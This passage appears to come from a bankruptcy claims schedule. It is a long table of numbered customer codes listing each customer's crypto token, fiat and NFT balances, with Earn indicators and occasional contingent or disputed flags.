| 07345952 | | CUSDT[2], USD[0.01] | | |
| 07345953 | | CUSDT[1], DOGE[175.52212053], USD[0.00] | | |
| 07345954 | | ETH[0], ETHW[0], SOL[0], USD[0.00] | Yes | |
| 07345955 | | DOGE[3908.63233749], SHIB[2532206.78804262], USD[0.00] | | |
| 07345956 | | CUSDT[2], DOGE[.00022763], TRX[1], USD[0.00] | | |
| 07345957 | | USD[71.22] | | |
| 07345958 | | USD[10.00] | | |
| 07345959 | | CUSDT[1], USD[0.00] | | |
| 07345960 | | USD[10.00] | | |
| 07345961 | | CUSDT[1], DOGE[.00006686], USD[0.01] | Yes | |
| 07345962 | | AVAX[95.24878138], BAT[1.01262812], BRZ[10.78164763], CUSDT[15], DOGE[4], LINK[1.07117222], MKR[1.77178959], NFT [301819714164635684/Mad Lions Series #2][1], NFT [458289270590640268/Dreams of the inevitiable][1], NFT [491416210583634896/Dreams of Love][1], NFT [493892860915189837/Dreams of the Erotic][1], NFT [497998583187656931/Mad Lions Series #3][1], NFT [571273940091307815/Dreams of the future][1], SHIB[2], SOL[90.35760587], SUSHI[168.63157328], TRX[4], USD[0.00], USDT[5.45369253] | Yes | |
| 07345963 | | BAT[1.67728311], TRX[88.88380078], USD[9.50] | | |
| 07345964 | | USD[10.00] | | |
| 07345966 | | USD[10.00] | | |
| 07345967 | | CUSDT[1], DOGE[.97999496], TRX[1], USD[1.69] | | |
| 07345968 | | USD[0.01] | | |
| 07345969 | | DOGE[1615.27000321], USD[10.00] | | |
| 07345970 | | CUSDT[3], USD[0.00], USDT[0.72877400] | | |
| 07345971 | | DOGE[0], USDT[0.00027759] | | |
| 07345972 | | USD[10.00] | | |
| 07345974 | | USD[10.00] | | |
| 07345975 | | DOGE[1888.95949495], USD[0.00] | | |
| 07345976 | | USD[0.01], USDT[0] | | |
| 07345977 | | USD[0.00], USDT[9.94009986] | | |
| 07345978 | | SUSHI[1.26838342], USD[0.00] | | |
| 07345979 | | SHIB[4147.8863131], SOL[7.29071725], USD[0.00] | | |
| 07345980 | | USD[10.00] | | |
| 07345981 | | USD[0.00] | Yes | |
| 07345982 | | USD[10.00] | | |
| 07345983 | | BRZ[2], BTC[.00589446], CUSDT[10], DOGE[719.49692746], ETH[.48845045], ETHW[.48845045], LTC[1.29366522], SHIB[2736721.34649529], TRX[2178.18479116], USD[0.00], USDT[0.00071218] | | |
| 07345984 | | USD[10.00] | | |
| 07345985 | | BRZ[1], USD[0.00], USDT[0] | | |
| 07345986 | | BRZ[1], CUSDT[3], TRX[1], USD[0.01] | | |
| 07345987 | | USD[0.02] | | |
| 07345988 | | USD[10.00] | | |
| 07345989 | | USD[0.00] | | |
| 07345990 | | SOL[.05016151], USD[0.00] | | |
| 07345992 | | BTC[.00079584], CUSDT[1], USD[10.00] | | |
| 07345993 | | USD[10.00] | | |
| 07345994 | | USD[10.00] | | |
| 07345995 | | DOGE[.39408645], TRX[2], USD[0.01] | | |
| 07345996 | | CUSDT[3], DOGE[1], SOL[3.82250797], USD[0.01] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07345997 | | USD[11.05] | Yes | |
| 07345998 | | USD[10.00] | | |
| 07345999 | | CUSDT[1], DOGE[1], USD[0.00] | | |
| 07346000 | | USD[0.00] | | |
| 07346001 | | CUSDT[11], DOGE[0], SHIB[1], TRX[2], USD[8.99] | | |
| 07346002 | | DOGE[34.34473895], USD[0.00] | | |
| 07346003 | | BTC[0], DOGE[0], LTC[0], TRX[0] | | |
| 07346004 | | BRZ[1], CUSDT[1], DOGE[0], ETH[0], LINK[0], TRX[2521.69338745], USD[0.00] | | |
| 07346005 | | AAVE[.15743412], AVAX[1.0648355], BAT[39.01331138], BCH[.12299844], BRZ[4], BTC[.03944377], CUSDT[302.14946646], DAI[.00054796], DOGE[927.80595389], ETH[.15305037], ETHW[.15228792], GRT[281.2685794], KSHIB[166.79355612], LINK[1.20222157], LTC[2.26113869], MKR[.02411826], NFT (559497074872793332/Entrance Voucher #3281)[1], PAXG[.03436206], SHIB[999299.0183132], SOL[6.03496919], SUSHI[1.11471983], TRX[1782.03436914], UNI[2.35432316], USD[0.00], USDT[0], YFI[.00143324] | Yes | |
| 07346006 | | USD[10.00] | | |
| 07346007 | | BTC[.0001959], USD[0.00] | | |
| 07346008 | | CUSDT[1], USD[0.01] | | |
| 07346009 | | DOGE[15.53634686], USD[0.03] | | |
| 07346010 | | USD[10.00] | | |
| 07346011 | | USD[48.86] | Yes | |
| 07346013 | | BTC[0.00007256], CUSDT[1], DOGE[0], ETH[0.00254245], ETHW[0.00254245], USD[0.00] | | |
| 07346014 | | USD[10.00] | | |
| 07346015 | | SOL[3.90531708], USD[0.14] | | |
| 07346016 | | SOL[0], USD[0.00] | Yes | |
| 07346017 | | ETH[2.25993724], ETHW[2.00530775], LTC[0], USD[0.00], USDT[0.00000753] | | |
| 07346018 | | BRZ[7], CUSDT[14], DOGE[1], GRT[2], LINK[0], TRX[3], USD[0.00], USDT[0.00000001] | | |
| 07346019 | | USD[10.00] | | |
| 07346020 | | BRZ[1], DOGE[2], GRT[1], USD[0.00] | | |
| 07346021 | | SHIB[1], TRX[1], USD[0.00] | | |
| 07346023 | | USD[10.00] | | |
| 07346024 | | DOGE[1.74607855], USD[0.00] | | |
| 07346026 | | USD[20.00] | | |
| 07346027 | | DOGE[0], USD[0.00] | | |
| 07346028 | | BAT[5.02844836], BRZ[2.00000002], BTC[0], CUSDT[6], DOGE[18.10241359], GRT[3.01706900], SOL[0], SUSHI[0], TRX[11.06252], USD[0.00], USDT[4.02275867] | | |
| 07346030 | | SHIB[132045.83009529], USD[0.00] | Yes | |
| 07346031 | | USD[10.00] | | |
| 07346032 | | USD[10.00] | | |
| 07346033 | | USD[10.00] | | |
| 07346034 | | USD[10.00] | | |
| 07346035 | | USD[10.00] | | |
| 07346037 | | USD[10.00] | | |
| 07346038 | | USD[10.00] | | |
| 07346039 | | USD[10.00] | | |
| 07346040 | | USD[10.00] | | |
| 07346041 | | USD[3.49] | | |
| 07346042 | | BCH[0], BRZ[0], BTC[0], CUSDT[0], DOGE[0.44681668], ETH[0], ETHW[0], GRT[0], LINK[0], SOL[0], TRX[0], USD[0.00], USDT[0] | | |
| 07346043 | | USD[10.00] | | |
| 07346044 | | BTC[0], CUSDT[2], SUSHI[0], TRX[1], UNI[0], USD[0.00] | | |
| 07346045 | | BAT[.01044809], CUSDT[2], DOGE[2288.65431695], TRX[1], USD[0.01], USDT[0] | Yes | |
| 07346046 | | CUSDT[1], USD[0.29] | | |
| 07346047 | | USD[10.00] | | |
| 07346048 | | USD[10.00] | | |
| 07346049 | | USD[10.00] | | |
| 07346050 | | DOGE[142.24034806], ETH[.06037347], ETHW[.06037347], LINK[.36681273], USD[0.00] | | |
| 07346051 | | USD[10.00] | | |
| 07346052 | | USD[10.00] | | |
| 07346053 | | LINK[.092], USD[0.00] | | |
| 07346054 | | AUD[0.00], BAT[0], BCH[0], BRZ[0], BTC[0], DOGE[2], ETH[0], LINK[0], LTC[0], PAXG[0], SUSHI[0], TRX[0], UNI[0], USD[0.09], YFI[0] | Yes | |
| 07346055 | Contingent, Disputed | BTC[0], CUSDT[3], DOGE[0], ETH[0], USD[0.00], USDT[0] | | |
| 07346056 | | NFT (300145734989097831/Fortune Cookie Says HODL)[1], USD[0.00] | | |
| 07346057 | | CUSDT[1], USD[0.00] | | |
| 07346058 | | USD[10.00] | | |

Amended Schedule F-15 priority to General Customer Change

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07346059 | | USD[10.00] | | |
| 07346060 | | USD[10.00] | | |
| 07346062 | | BRZ[1], CUSDT[4], GRT[1], TRX[6], USD[0.37], USDT[0] | | |
| 07346063 | | DOGE[330.24919145], USD[0.00] | | |
| 07346064 | | USD[10.00] | | |
| 07346065 | | USD[10.00] | | |
| 07346066 | | USD[10.00] | | |
| 07346067 | | TRX[0], USD[3.07], USDT[0] | | |
| 07346068 | | BTC[.01436782], DOGE[.7], USD[0.00] | | |
| 07346070 | | DOGE[140.59621512], USD[0.00] | | |
| 07346071 | | USD[10.00] | | |
| 07346072 | | DOGE[.03154329], TRX[1], USD[0.01] | Yes | |
| 07346074 | | USD[0.01] | | |
| 07346075 | | CUSDT[1], USD[0.00] | Yes | |
| 07346076 | | BRZ[1], CUSDT[2], DOGE[2], ETH[0], ETHW[0.51527891], SHIB[16758.03677566], TRX[5], USD[0.00] | Yes | |
| 07346077 | | BRZ[1], CUSDT[1], DOGE[.00003675], SHIB[1344086.02150537], USD[0.02] | | |
| 07346078 | | USD[10.00] | | |
| 07346079 | | BAT[2], BRZ[2], CUSDT[2], DOGE[1], LINK[77.37401754], TRX[2], USD[0.00], USDT[3.1055396] | Yes | |
| 07346080 | | BRZ[1], CUSDT[7], GRT[0], SHIB[1], TRX[1], USD[0.00] | | |
| 07346082 | | GRT[1], TRX[1], USD[0.48] | | |
| 07346083 | | USD[10.00] | | |
| 07346084 | | BRZ[2], USD[0.00] | | |
| 07346085 | | CUSDT[1], TRX[1], USD[0.00] | | |
| 07346087 | | CUSDT[1], USD[0.00] | | |
| 07346088 | | DOGE[3.14284211], USD[9.00] | | |
| 07346089 | | CUSDT[2], DOGE[17424.26579051], USD[0.00] | | |
| 07346090 | | USD[10.00] | | |
| 07346091 | | DOGE[.66120617], USD[0.00] | | |
| 07346092 | | AUD[0.00], BAT[1], BRZ[2], BTC[0], CUSDT[5], ETH[0], GRT[0], TRX[5], USD[0.01] | | |
| 07346093 | | USD[10.00] | | |
| 07346095 | | BTC[.00016931], CUSDT[1], USD[0.00] | | |
| 07346096 | | CUSDT[1], DOGE[0], ETH[0], UNI[0], USD[0.00] | | |
| 07346097 | | DOGE[457.23295473], MATIC[78.89358562], SHIB[2], USD[3.20] | | |
| 07346098 | | BRZ[2], CUSDT[1], DOGE[0], TRX[1], USD[0.01] | | |
| 07346100 | | DOGE[1], USD[0.00] | | |
| 07346102 | | AAVE[.00000001], BTC[0], DOGE[1], ETH[0.00000028], GRT[0], NFT (476822033343791981/Entrance Voucher #3020)[1], SHIB[6], SOL[0.00000001], USD[0.00], USDT[0], YFI[0] | Yes | |
| 07346103 | | USD[10.00] | | |
| 07346104 | | USD[0.00] | | |
| 07346105 | | DOGE[3435.85741391], USD[10.00] | | |
| 07346106 | | USD[10.00] | | |
| 07346107 | | BRZ[1], CUSDT[2], DOGE[2], SOL[13.30715418], TRX[2], USD[0.00] | Yes | |
| 07346110 | | USD[10.00] | | |
| 07346111 | | BRZ[3], CUSDT[1], DOGE[1], USD[0.58] | | |
| 07346112 | | USD[10.00] | | |
| 07346113 | | BTC[0], GRT[0], USD[0.00] | | |
| 07346114 | | USD[10.00] | | |
| 07346115 | | BAT[1], BRZ[1], DOGE[.00006674], TRX[2], USD[0.01], USDT[0] | | |
| 07346116 | | BRZ[1], SHIB[1], USD[0.00], USDT[0] | | |
| 07346117 | | DOGE[1], SOL[.21191553], USD[0.00] | | |
| 07346118 | | CUSDT[1], USD[10.00] | | |
| 07346119 | | BAT[1], BRZ[3], CUSDT[1], DOGE[7376.82802634], ETH[0], ETHW[0], TRX[4], USD[0.42], USDT[1] | | |
| 07346121 | | USD[10.00] | | |
| 07346122 | | CUSDT[2], PAXG[.00699677], USD[0.00] | Yes | |
| 07346123 | | DOGE[136.34759427], TRX[1], USD[0.00] | | |
| 07346124 | | USD[10.00] | | |
| 07346125 | | BCH[0], BTC[0], CUSDT[1], DOGE[0], USD[0.00] | | |
| 07346126 | | TRX[2], USD[0.00] | | |
| 07346127 | | BRZ[3], CUSDT[1], TRX[3], USD[0.01] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07346128 | | USD[0.00] | | |
| 07346129 | | USD[10.00] | | |
| 07346131 | | ETHW[2.76429267], USD[21.96] | Yes | |
| 07346132 | | DOGE[4.48817163], USD[0.00], USDT[0] | | |
| 07346133 | Contingent, Disputed | USD[0.00] | Yes | |
| 07346134 | | USD[10.00] | | |
| 07346135 | | USD[500.00] | | |
| 07346136 | | CUSDT[1], TRX[176.35698321], USD[0.00] | | |
| 07346137 | | USD[10.00] | | |
| 07346138 | | USD[10.00] | | |
| 07346139 | | BRZ[1], CUSDT[9], DOGE[.00579528], TRX[2], USD[0.00], USDT[1] | | |
| 07346140 | | BRZ[1], CUSDT[7], DOGE[1], KSHIB[917.36369489], SHIB[993243.83688588], SOL[27.04132403], TRX[2], USD[0.00] | Yes | |
| 07346141 | | BCH[0], BTC[0], CUSDT[1], DOGE[0], ETH[0], SUSHI[0], USD[0.00] | Yes | |
| 07346142 | | USD[10.00] | | |
| 07346143 | | DOGE[0], GRT[0], LINK[0], TRX[0], UNI[0], USD[0.00] | | |
| 07346146 | | BAT[0], BRZ[0], BTC[0], DOGE[1.00007491], ETH[0], GRT[0], SOL[0], TRX[1], UNI[0], USD[0.00], USDT[0] | | |
| 07346147 | | BTC[.00018355], CUSDT[1], USD[0.01] | Yes | |
| 07346148 | | USD[10.00] | | |
| 07346150 | | USD[10.00] | | |
| 07346151 | | USD[10.00] | | |
| 07346152 | | USD[10.00] | | |
| 07346153 | | ETH[0], ETHW[0], USD[0.00], USDT[.00000009] | | |
| 07346155 | | BTC[.00022279], DOGE[.00031844], USD[0.00] | | |
| 07346156 | | USD[10.00] | | |
| 07346157 | | USD[10.00] | | |
| 07346158 | | USD[10.00] | | |
| 07346159 | | BAT[1], BRZ[1], ETH[0], LTC[0], SHIB[3], TRX[2], USD[0.00] | Yes | |
| 07346160 | | BRZ[1], ETC[.07379033], CUSDT[270], DOGE[1036.03767136], ETH[1.16565814], ETHW[1.36565814], GRT[467.88642433], LINK[554.48237295], SHIB[50098866.53954682], SOL[4.37900722], SUSHI[1], TRX[335], UNI[2], USD[0.01], USDT[0.00000001] | | |
| 07346161 | | USD[10.00] | | |
| 07346162 | | BAT[1], TRX[1], USD[0.00], USDT[0] | | |
| 07346163 | | CUSDT[3], DOGE[0], ETH[0], USD[0.00] | Yes | |
| 07346164 | | BTC[.0095068], DOGE[1526.45096265], ETH[.01808266], ETHW[.01808266], SHIB[5761514.49677176], USD[0.40] | | |
| 07346166 | | BTC[0.00027185], CUSDT[3], DOGE[99.73334931], TRX[1], USD[0.26] | | |
| 07346167 | | CUSDT[1], DOGE[1], USD[0.01] | | |
| 07346168 | | USD[10.00] | | |
| 07346169 | | BTC[.00016931], USD[0.00] | | |
| 07346170 | | CUSDT[3], TRX[13.74862236], USD[0.00] | Yes | |
| 07346171 | | CUSDT[1], DOGE[44.97854083], USD[0.00] | Yes | |
| 07346173 | | BTC[0], USD[0.01] | Yes | |
| 07346174 | Contingent, Disputed | USD[0.00] | | |
| 07346175 | | USD[10.00] | | |
| 07346177 | | BAT[1], BTC[0], DOGE[0], ETH[0], ETHW[0.32655959], USD[0.00], USDT[0.00000001] | | |
| 07346178 | | USD[10.00] | | |
| 07346179 | | USD[10.00] | | |
| 07346181 | | USD[10.00] | | |
| 07346182 | | USD[10.00] | | |
| 07346183 | | DOGE[3219.3757168], SOL[16.73218692], SUSHI[12.68109825], TRX[1], USD[0.01] | | |
| 07346184 | | BAT[1], BRZ[3], BTC[.00018017], CUSDT[5], DOGE[2459.81682677], TRX[3], USD[0.00] | | |
| 07346185 | | USD[10.00] | | |
| 07346186 | | BTC[.00835523], DOGE[1], ETH[.01238497], ETHW[.01223438], GRT[179.61222862], LINK[16.61774259], LTC[2.81364814], SHIB[1421.81564056], TRX[1], USD[0.00], YFI[.00197402] | Yes | |
| 07346187 | | USD[10.00] | | |
| 07346188 | | AAVE[.03781112], BAT[.01375398], BTC[.00011089], CUSDT[10.99996107], DOGE[967.34325322], ETH[.00318327], ETHW[.0031422], LINK[28695833], LTC[.04494366], SHIB[1487.43532306], SOL[.15043586], SUSHI[.64909526], TRX[80.51099593], UNI[.33620236], USD[0.00] | Yes | |
| 07346189 | | USD[10.00] | | |
| 07346190 | | BRZ[1], CUSDT[8], DOGE[10.39823642], GRT[86.85958103], LINK[1.82799557], LTC[.00055231], MATIC[108.33174752], NFT [299708860486918707/Roamer #775][1], NFT [307565556596886676/Ravager #1207][1], NFT [573526679265591902/Baddies #537][1], SHIB[4558915.9277491], SOL[2.17261576], TRX[937.34943783], USD[0.15] | Yes | |
| 07346191 | | DOGE[2558.36881318], USD[0.19], USDT[0] | Yes | |
| 07346192 | | DOGE[0], USDT[0.00046441] | | |
| 07346193 | | DOGE[0], KSHIB[.99783712], TRX[0], USD[0.00], USDT[0] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07346194 | | USD[10.00] | | |
| 07346195 | | USD[10.00] | | |
| 07346196 | | BRZ[1], BTC[.006829], CUSDT[2], DOGE[32.15408699], TRX[2], USD[4.33] | Yes | |
| 07346197 | | BF_POINT[300], ETH[0.00000114], ETHW[0], LINK[0.00017007], SHIB[2], USD[0.00] | Yes | |
| 07346198 | | DOGE[461.63814007], USD[0.00] | | |
| 07346199 | | USD[10.00] | | |
| 07346200 | | BAT[46.74122138], BRZ[4], CUSDT[12], DOGE[10.23709709], GRT[5.21873544], MATIC[21.06463166], SHIB[2], TRX[229.50251566], USD[0.00], USDT[2.13330027] | Yes | |
| 07346201 | | USD[10.58] | Yes | |
| 07346202 | | USD[10.00] | | |
| 07346203 | | TRX[237.356494], USD[0.00] | Yes | |
| 07346204 | | USD[10.00] | | |
| 07346206 | | USD[10.00] | | |
| 07346207 | | DOGE[4628.82048924], USD[0.00] | Yes | |
| 07346208 | | CUSDT[1], GRT[.09242145], TRX[1], USD[0.00], USDT[0] | | |
| 07346209 | | USD[10.00] | | |
| 07346210 | | USD[10.00] | | |
| 07346211 | | BTC[.002675], CUSDT[2], DOGE[2870.39840499], TRX[1], USD[0.00] | | |
| 07346212 | | BRZ[1], BTC[.05316465], CUSDT[3], DOGE[1], ETH[.12535034], ETHW[.12420872], SHIB[11231885.43259403], TRX[1], USD[534.50] | Yes | |
| 07346213 | | CUSDT[15], DOGE[1], ETH[0], TRX[1], USD[0.01] | Yes | |
| 07346214 | | CUSDT[1], USD[0.00] | | |
| 07346215 | | CUSDT[1], DOGE[19.59896119], TRX[50.22142888], USD[0.00] | Yes | |
| 07346216 | | SHIB[67285.75879043], USD[0.00] | Yes | |
| 07346218 | | USD[10.00] | | |
| 07346219 | | USD[10.00] | | |
| 07346220 | | USD[10.00] | | |
| 07346221 | | CUSDT[6], DOGE[1], TRX[4], USD[0.01] | | |
| 07346222 | | USD[10.00] | | |
| 07346223 | | BTC[0.41653605], DOGE[4], ETH[.00008595], ETHW[.00008595], GRT[1458.54441205], LINK[1], SHIB[1], SOL[0], SUSHI[67.46339424], TRX[5], USD[8301.69], YFI[.02941279] | | |
| 07346224 | | USD[10.00] | | |
| 07346225 | | BTC[.0003193], CUSDT[2], DOGE[1], ETH[.00130975], ETHW[.00129607], SOL[.16971262], TRX[1], USD[0.15] | Yes | |
| 07346226 | | BAT[1], CUSDT[4], DOGE[112.35584095], ETH[.29093106], ETHW[.29093106], USD[0.00] | | |
| 07346227 | | DOGE[1], USD[0.00] | | |
| 07346228 | | USD[10.00] | | |
| 07346229 | | USD[0.00] | | |
| 07346231 | | USD[0.01], USDT[0] | | |
| 07346232 | | BTC[0], DAI[.00000001], DOGE[1], GRT[0], MATIC[0.01507168], NFT (372191658981692723/Red Panda #537)[1], NFT (377190537024614220/GOONEY #3597)[1], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07346235 | | USD[10.00] | | |
| 07346236 | | USD[10.00] | | |
| 07346237 | | SOL[.98250727], SUSHI[7.71387977], TRX[2], USD[0.00] | Yes | |
| 07346238 | | BRZ[0], DOGE[0], ETH[0.00000001], ETHW[0], SHIB[0], SOL[0.00007183], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07346239 | | USD[10.00] | | |
| 07346241 | | BAT[8.44232323], BTC[0.00007874], USD[0.34] | | |
| 07346242 | | USD[10.00] | | |
| 07346243 | | USD[10.00] | | |
| 07346244 | | BAT[1], BCH[0], BRZ[5], BTC[0], CUSDT[7], DOGE[2.01042352], ETH[0], ETHW[5.20677939], GRT[497.35551340], LINK[6.9366409], LTC[0], MATIC[594.71477192], NFT (383815057248813565/3D CATPUNK #121)[1], NFT (423583578142455642/Saudi Arabia Ticket Stub #350)[1], NFT (426881737487779472/3D CATPUNK #1484)[1], NFT (430605081008672682/3D CATPUNK #3494)[1], NFT (488406429366881465/Elysian - #4130)[1], NFT (557840657846680239/Elysian - #4733)[1], NFT (562482786716250537/Barcelona Ticket Stub #1429)[1], SHIB[39.06080018], SOL[0.66568141], TRX[6], UNI[0], USD[0.06], USDT[1.09961318] | Yes | |
| 07346245 | | USD[10.00] | | |
| 07346247 | | CUSDT[3], USD[0.01] | | |
| 07346248 | | USD[10.00] | | |
| 07346249 | | CUSDT[1574.61411594], GRT[27.35592937], TRX[2], USD[0.01] | Yes | |
| 07346250 | | CUSDT[4], DOGE[3230.61961528], ETH[.03020539], ETHW[.03020539], TRX[2], USD[0.00] | | |
| 07346251 | | USD[10.00] | | |
| 07346252 | | DOGE[1.09765452], USD[0.69] | | |
| 07346253 | | DOGE[.16455137], USD[0.00] | Yes | |
| 07346254 | | USD[10.00] | | |
| 07346255 | | BRZ[0], DOGE[1], ETH[0], SUSHI[0], USD[0.00] | | |
| 07346256 | | BCH[.00080732], CUSDT[11], DOGE[1.84371554], ETH[.00008525], ETHW[.00008525], SOL[.00199293], TRX[31.89059193], UNI[.05302076], USD[13.50] | | |
| 07346257 | | BRZ[.85464833], CUSDT[7], DOGE[7731.15630634], ETH[.49157651], ETHW[.49136548], KSHIB[0.40861931], SHIB[989255.84648346], TRX[.50533849], USD[0.07], USDT[0.07477266] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07346258 | | USD[10.00] | | |
| 07346259 | | USD[10.00] | | |
| 07346260 | | USD[10.00] | | |
| 07346261 | | USD[10.00] | | |
| 07346262 | | USD[10.00] | | |
| 07346263 | | BAT[1], USD[10.00] | | |
| 07346264 | | USD[10.00] | | |
| 07346265 | | ETH[0], CUSDT[1] (305775835236433710/Entrance Voucher #4319)[1], NFT (52149994432507688 2/Testing #1)[1], SOL[0.00000001], USD[9.45] | | |
| 07346266 | | BAT[34.34550125], BRZ[1], CUSDT[9.00035213], DOGE[1.00000311], TRX[.0000307], UNI[1.12619126], USD[0.01], USDT[0] | Yes | |
| 07346267 | | USD[10.00] | | |
| 07346268 | | BRZ[1], CUSDT[3], DOGE[3309.17266729], SOL[28.16686659], TRX[536.06477148], USD[0.00] | Yes | |
| 07346269 | | BRZ[2], CUSDT[5], DOGE[0], TRX[92.5416157], USD[0.00], USDT[1] | | |
| 07346270 | | USD[0.14] | | |
| 07346271 | | USD[10.00] | | |
| 07346272 | | USD[10.00] | | |
| 07346273 | | BTC[0], CUSDT[3], DOGE[0], SUSHI[0], TRX[1], USD[0.00] | | |
| 07346274 | | USD[10.00] | | |
| 07346275 | | CUSDT[3], USD[26.33] | | |
| 07346276 | | USD[10.00] | | |
| 07346277 | | USD[10.00] | | |
| 07346278 | | CUSDT[3], DOGE[4], TRX[1], USD[0.00] | | |
| 07346279 | | USD[0.00] | Yes | |
| 07346280 | | CUSDT[1], DOGE[6.02233431], USD[0.01] | | |
| 07346281 | | USD[10.00] | | |
| 07346282 | | USD[0.63] | | |
| 07346283 | | USD[10.00] | | |
| 07346284 | | USD[10.00] | | |
| 07346285 | | USD[10.00] | | |
| 07346287 | | DOGE[7.94882943], USD[0.00] | | |
| 07346288 | | CUSDT[1], DOGE[3315.6828483], NFT (294781534260953431/Entrance Voucher #3933)[1], USD[10.00] | | |
| 07346289 | | USD[10.00] | | |
| 07346290 | | BRZ[1], CUSDT[18.00023972], DOGE[98.52651559], TRX[1], USD[0.01] | Yes | |
| 07346291 | | BF_POINT[200], BRZ[1], BTC[0], CUSDT[8], DOGE[1], SOL[0], TRX[4], USD[0.00], USDT[1.05856368] | Yes | |
| 07346293 | | USD[10.00] | | |
| 07346294 | | BRZ[1], CUSDT[10], DOGE[1.00005666], ETH[.00000018], ETHW[.00000018], LINK[.00002661], LTC[.00009729], SHIB[6837.50591127], SOL[.00006359], TRX[.00004813], USD[0.00], USDT[2] | | |
| 07346295 | | BAT[1], BRZ[2], CUSDT[1], DOGE[7], GRT[1], TRX[4], USD[0.00] | | |
| 07346296 | | USD[10.00] | | |
| 07346297 | | BAT[2.13247621], BRZ[1], CUSDT[3], DOGE[7494.78418927], TRX[8], UNI[.00004988], USD[0.00], USDT[0] | Yes | |
| 07346298 | | BTC[.00172323], CUSDT[5], ETH[.04708634], ETHW[.04649902], MATIC[72.108813], SOL[.79974488], TRX[231.60421656], UNI[4.1152744], USD[0.00] | Yes | |
| 07346299 | | BAT[2.03931615], BRZ[2], DOGE[4], GRT[2], SHIB[394014968.98941168], TRX[3], USD[0.00], USDT[0] | Yes | |
| 07346301 | | USD[10.00] | | |
| 07346302 | | DOGE[.73892629], USD[0.00], USDT[1] | | |
| 07346303 | | USD[0.00] | | |
| 07346305 | | USD[10.00] | | |
| 07346306 | Contingent, Disputed | BAT[0], BTC[0], CUSDT[0], DOGE[0], ETH[0], GRT[0], LINK[0], LTC[0], MATIC[0], SGD[0.00], SHIB[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], YFI[0] | Yes | |
| 07346307 | | USD[0.00] | | |
| 07346308 | | USD[0.00] | | |
| 07346309 | | USD[10.00] | | |
| 07346310 | | BRZ[1], CUSDT[8], DOGE[386.57210072], TRX[2], USD[17.63] | | |
| 07346311 | | USD[0.01], USDT[0.00000001] | | |
| 07346312 | | USD[20.00] | | |
| 07346313 | | USD[10.00] | | |
| 07346315 | Contingent, Disputed | DOGE[0], USD[0.00] | | |
| 07346316 | | USD[10.00] | | |
| 07346317 | | USD[10.00] | | |
| 07346318 | | USD[10.00] | | |
| 07346319 | | DOGE[1], USD[0.00] | | |
| 07346320 | | CUSDT[2], DOGE[1], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07346321 | | DOGE[1], USD[0.00] | | |
| 07346322 | | BTC[.00026158], CUSDT[4], DOGE[1], TRX[4], USD[0.01] | Yes | |
| 07346323 | | USD[10.00] | | |
| 07346324 | | USD[10.00] | | |
| 07346325 | | CUSDT[1], TRX[1], USD[0.00] | | |
| 07346326 | | ETH[.00000018], ETHW[.00000018], USD[0.00], USDT[0] | | |
| 07346327 | | USD[10.00] | | |
| 07346328 | | CUSDT[1], TRX[2], USD[0.01] | | |
| 07346329 | | BTC[.00000733], DOGE[2.05141863], USD[0.08] | | |
| 07346330 | | USD[10.00] | | |
| 07346331 | | USD[10.00] | | |
| 07346332 | | BTC[.00020826], USD[0.00] | | |
| 07346333 | | CUSDT[8], DOGE[421.86130915], LTC[3.37391102], TRX[11], USD[1.04] | | |
| 07346334 | | DOGE[7238.83062706], SOL[.32051452], TRX[1], USD[0.00] | Yes | |
| 07346335 | | CUSDT[1], DOGE[24.27989533], USD[0.00] | | |
| 07346336 | | CUSDT[42.84925399], DOGE[505.7182266], SHIB[1], TRX[1], USD[40.69] | | |
| 07346337 | | USD[0.16] | | |
| 07346339 | | BRZ[2], CUSDT[3], DOGE[1760.14674691], TRX[207.76574743], USD[0.20] | | |
| 07346340 | | TRX[.05730917], USD[0.00] | | |
| 07346341 | | BRZ[1], DOGE[1], TRX[1], USD[0.00] | | |
| 07346342 | | USD[10.00] | | |
| 07346343 | | USD[10.00] | | |
| 07346344 | | BRZ[0], CUSDT[1], DOGE[.00000374], USD[0.00] | | |
| 07346345 | | USD[10.00] | | |
| 07346347 | | USD[10.00] | | |
| 07346348 | | BRZ[3], CUSDT[5], USD[0.00] | | |
| 07346349 | | BTC[.00021672], DOGE[934.25692119], USD[0.02] | | |
| 07346350 | | DOGE[148.73538607], USD[0.00] | Yes | |
| 07346351 | | USD[10.00] | | |
| 07346352 | | CUSDT[1], DOGE[242.3114465], USD[0.84] | | |
| 07346353 | | TRX[225.3331857], USD[0.00] | Yes | |
| 07346354 | | CUSDT[1], ETH[.01348443], SHIB[2], USD[0.00] | | |
| 07346355 | | BRZ[4], CUSDT[51.14602425], ETHW[.61280829], SHIB[65], SUSHI[8.53949814], UNI[4.93739731], USD[159.74] | Yes | |
| 07346356 | | USD[10.00] | | |
| 07346357 | | CUSDT[6], GRT[1], USD[0.01], USDT[1] | | |
| 07346358 | | USD[10.00] | | |
| 07346359 | | DOGE[.0178505], SHIB[3], TRX[1], USD[0.01] | Yes | |
| 07346360 | | DOGE[1.24725113], USD[0.11] | | |
| 07346361 | | USD[10.00] | | |
| 07346362 | | BRZ[1], BTC[.00152803], CUSDT[2], DOGE[1.00877161], ETH[.06646769], ETHW[.06564269], GRT[23.67698512], SOL[6.79431784], SUSHI[3.50097811], USD[0.40] | Yes | |
| 07346363 | | USD[10.00] | | |
| 07346364 | | LINK[4.52727344], SOL[9.79382507], USD[0.00] | Yes | |
